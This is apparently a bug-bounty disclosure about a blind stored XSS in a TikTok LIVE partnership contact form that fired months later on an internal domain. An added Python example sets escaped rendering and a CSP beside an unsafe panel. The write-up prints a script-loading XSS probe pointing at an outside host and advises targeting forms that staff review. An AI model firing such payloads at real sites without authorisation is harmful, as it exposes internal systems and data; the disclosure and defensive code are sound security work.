Blind Stored XSS in TikTok LIVE — Triggered in Sensitive Internal Infrastructure

From Contact Form to Internal Vulnerability — A Blind Stored XSS in TikTok’s Sensitive Internal Infrastructure

All due respect and appreciation to the TikTok team for their professional and fair handling of this security report.

This time, our story revolves around a real vulnerability caused by a Blind Stored XSS in the TikTok platform.

On September 27, 2024, I began a security assessment on a subdomain owned by TikTok dedicated to managing live streaming — a platform used by verified agencies, creator networks, and internal teams to support creators and live stream operations.

The subdomain offered limited functionality, primarily allowing users to apply for official partnership status.

Given this limited user interaction, one might assume the attack surface is minimal. But this led me to consider a less common but more impactful vector: Blind Stored XSS attacks.

The First Attempt

I tried injecting characters into various form fields:

</ > ' "
'"><script src=https://my-server></script>

But they were all rejected, and the form only accepted plain English characters.

I gave up and submitted the form using my real personal details, without any malicious payloads.

Later, I came across another form — a contact form for partnership inquiries.

I tested various tags and found that the form accepted some and rejected others.
So I crafted a custom Blind XSS payload suitable for this form — and it was successfully submitted.
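To show where the real control sits in a case like this, here is an added Python example (my own illustration, not TikTok's code; field names are hypothetical and the callback host is a placeholder): the first form's plain-character allowlist beside an internal review page rendered first without and then with output encoding, plus a CSP header for the internal panel as defence in depth.

```python
import html

# Constructed sample record: the kind of contact-form submission an internal
# reviewer opens in a back-office panel months later (hypothetical fields).
SUBMISSION = {
    "name": "Test Submitter",
    "company": "Example Agency",
    # Constructed probe in the style of the '"><script src=...> probe above;
    # the host is a placeholder, not a real callback endpoint.
    "message": '"><script src="https://callback.example.invalid/probe.js"></script>',
}


def looks_plain_english(value: str) -> bool:
    """Input allowlist like the first form: ASCII letters, digits, spaces and
    basic punctuation only. It protects only the forms that enforce it."""
    return all(ch.isascii() and (ch.isalnum() or ch in " .,'-@") for ch in value)


def render_unsafe(sub: dict) -> str:
    """Review panel built by string concatenation: stored text is written
    straight into the HTML, so a stored payload runs in the reviewer's
    browser whenever the record is opened."""
    return (
        f"<tr><td>{sub['name']}</td><td>{sub['company']}</td>"
        f"<td>{sub['message']}</td></tr>"
    )


def render_safe(sub: dict) -> str:
    """Same panel with output encoding at render time. html.escape(quote=True)
    neutralises <, >, &, \" and ' so the stored text is displayed literally,
    regardless of what the submitting form allowed through."""
    fields = (sub["name"], sub["company"], sub["message"])
    cells = "".join(f"<td>{html.escape(str(v), quote=True)}</td>" for v in fields)
    return f"<tr>{cells}</tr>"


def contains_active_markup(rendered: str) -> bool:
    """Regression check for a test suite: a rendered row must never contain a
    live <script tag."""
    return "<script" in rendered.lower()


def internal_panel_headers() -> dict:
    """Defence in depth for the internal viewer: a CSP that forbids inline and
    third-party scripts means a missed encoding still cannot load an external
    callback script."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'"}
```

The allowlist is the filter the first form applied; the escaping step is what the internal panel needed, because it renders records from every form, including ones with weaker input filtering.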

I documented everything:

  • A screenshot of the form containing the payload
  • The OTP code I received via WhatsApp
  • Another screenshot confirming successful form submission

After that, I ended the test and moved on.

The Surprise — Six Months Later

I received a notification from XSS Hunter indicating that the payload had been executed on an internal TikTok domain, unknown to the public.

I reviewed the details — and was stunned by what I found:

Impact:

The vulnerability resulted in the unauthorized exposure of limited sensitive internal information, system data, and internal project details. If not addressed promptly, this issue could have led to more severe consequences, potentially impacting the organization’s security, privacy, and operational integrity.

I spent two full days analyzing the data and understanding what had happened.

One of the challenges I faced was identifying which form triggered the payload…

How did I pinpoint the exact endpoint responsible for this security issue?

  • Since the payload was executed on an internal domain, and I had tested multiple different endpoints, it was difficult to determine the form.
  • I searched the leaked data for personal details like my name and email address — but the real clue was the OTP code next to my phone number.
  • I checked my phone messages and confirmed that the code was received on September 27, 2024.
    That confirmed the payload had been stored for six months before being triggered accidentally by an internal staff member.

Key Lessons Learned from This Vulnerability:

  • Don’t send payloads randomly — make sure the form is highly likely to be reviewed manually by internal staff (e.g., official partnership forms), unlike generic feedback or performance forms that are often ignored.
  • Document everything — including screenshots of your payload, your personal information, and OTP codes (if any), since they provide irreplaceable proof.
  • Keep your documentation for at least a year — execution might occur months later.
  • Never underestimate Blind XSS — although rare, discovering it often means it’s already too late, and a serious vulnerability has been triggered. The danger lies in the fact that it typically activates only within sensitive internal environments.

These reflections capture the core lessons from this critical vulnerability. I hope they prove helpful to fellow researchers.

Severity Rating:

The vulnerability was ultimately classified as Medium (6.8 CVSS) by TikTok’s security team.

According to their assessment, this rating was attributed to the high complexity required to exploit the vulnerability, as well as the fact that the attacker had no direct control over when or whether the payload would be executed. Therefore, the “Attack Complexity” vector should be rated as High, in accordance with the CVSS rating.

As a security researcher, I fully agree with TikTok’s classification decision.

This case clearly shows that real-world impact may sometimes extend far beyond what is reflected in a traditional CVSS score.

Thank you very much for reading.
Best regards,
@Ahmed Abd Elrahman

Report:
https://hackerone.com/reports/3037447

Timeline:

Reported: March 14, 2025

Resolved: April 28, 2025
